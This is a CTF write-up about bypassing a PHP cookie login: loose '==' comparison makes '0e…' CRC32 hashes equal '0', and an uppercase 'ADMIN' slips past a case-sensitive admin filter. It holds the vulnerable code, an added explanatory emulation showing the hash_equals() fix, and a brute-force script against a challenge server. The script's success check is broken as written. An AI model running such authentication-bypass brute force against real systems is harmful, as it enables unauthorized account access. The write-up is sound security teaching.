The idea of this task is to log in as the user with idx=1. But we don't know who has this idx.
The algorithm for the cookie is CRC32, which is strange, because this hash is not meant for crypto, it's for checksums. But at first glance the server code looks good enough. REALLY THANKS TO THE ORGS, BECAUSE THE CODE IS GREAT AND SIMPLE, SO IT'S REALLY EASY TO UNDERSTAND THE LOGIC OF THE SERVER
After reading some manuals we decided that the vuln is in the hash, and found a post about comparison issues in PHP with float-like strings.
PHP is not strongly typed, and that's why there is some magic in comparisons. One of them: both strings are cast to float if they look like floats. For example:
if ("0e12" == "0") echo 1; else echo 2;
This code prints 1!!!! This is magic: two different strings are equal))
So we decided to brute-force the cookie. We always sent hash = "0" and a different timestamp each time.
Some calculation: we need the first symbol of the hash to be "0", the second "e", and all the other six hex digits to be decimal digits. So the probability is 1/16 * 1/16 * (10/16)**6, which is about 1/4300. That is not much for an online brute force.
The first part was done: we could log in with any id we wanted. But which id do we need?
After reading the code we found this strange function:
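To check the numbers above and to show why the fix is a byte-wise compare, here is an added example (not from the writeup or the challenge) that emulates PHP's loose "==" on numeric strings, scans timestamps against a constructed salt, and counts how many CRC32 values collapse to "0". It assumes zlib's CRC32 (PHP's 'crc32b'); PHP's 'crc32' variant uses another bit order but has the same 2^32 output space, so the rate is the same. The emulation also catches the "00e…" and all-zero forms, so the count comes out slightly above 1/4300.

```python
import re
import zlib
import hmac

# Simplified PHP numeric-string grammar: sign, digits, optional fraction, optional exponent.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_eq(a: str, b: str) -> bool:
    """Emulate PHP '==' on two strings: if both look numeric, compare as floats,
    otherwise compare bytewise. This is the behaviour the cookie check relies on."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_eq(a: str, b: str) -> bool:
    """What '===' or hash_equals() does: constant-time bytewise compare, no type juggling."""
    return hmac.compare_digest(a.encode(), b.encode())


def crc32_hex(data: bytes) -> str:
    """8-hex-digit CRC32 as PHP prints it (assumption: zlib polynomial, i.e. 'crc32b')."""
    return "%08x" % zlib.crc32(data)


def magic_hashes(salt: bytes, user: bytes, n: int) -> list:
    """Scan login_time = 0..n-1 and return the (time, hash) pairs whose CRC32
    loose-compares equal to the cookie value "0"; these are the hashes of form 0e<digits>."""
    hits = []
    for t in range(n):
        h = crc32_hex(salt + b"|" + str(t).encode() + b"|" + user)
        if php_loose_eq(h, "0"):
            hits.append((t, h))
    return hits


if __name__ == "__main__":
    # Constructed salt; the challenge's real salt is read from long_salt.txt and is unknown here.
    found = magic_hashes(b"constructed-salt", b"ADMIN", 200000)
    print(len(found), "magic hashes in 200000 timestamps, estimate from the writeup:", 200000 // 4300)
    for t, h in found[:3]:
        print(t, h, "loose ==:", php_loose_eq(h, "0"), "strict:", php_strict_eq(h, "0"))
```

Every hit passes the loose compare and fails the strict one, which is why replacing "==" with hash_equals() closes the hole regardless of the hash algorithm.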
public function islogin(){
    if( preg_match("/[^0-9A-Za-z]/", $_COOKIE['user_name']) ){
        exit("cannot be used Special character");
    }
    if( $_COOKIE['user_name'] == "admin" ) return 0;
    $salt = file_get_contents("../../long_salt.txt");
    if( hash('crc32',$salt.'|'.(int)$_COOKIE['login_time'].'|'.$_COOKIE['user_name']) == $_COOKIE['hash'] ){
        return 1;
    }
    return 0;
}
The check if( $_COOKIE['user_name'] == "admin" ) return 0; seems strange: why is the admin id restricted? This is easy to bypass. We just need to log in with the name in uppercase, because PHP uses a case-sensitive comparison, but SQL does not.
So the brute-force script is:
import requests

u1 = "http://219.240.37.153:5959/63972dfdacc8a838f618275d80d27c1d_h/index.php"

# Keep hash = "0" fixed and walk login_time until the server-side CRC32
# loose-compares equal to "0" (a hash of the form 0e<digits>).
for i in range(0, 10000000):
    print(i)
    cookies = {
        "login_time": str(i),
        "user_name": "ADMIN",
        "hash": "0"
    }
    try:
        r = requests.get(u1, cookies=cookies).text
    except requests.RequestException:
        continue
    # The failure marker string did not survive in the writeup; as written '' is always found.
    if '' not in r:
        print(r)
        exit(0)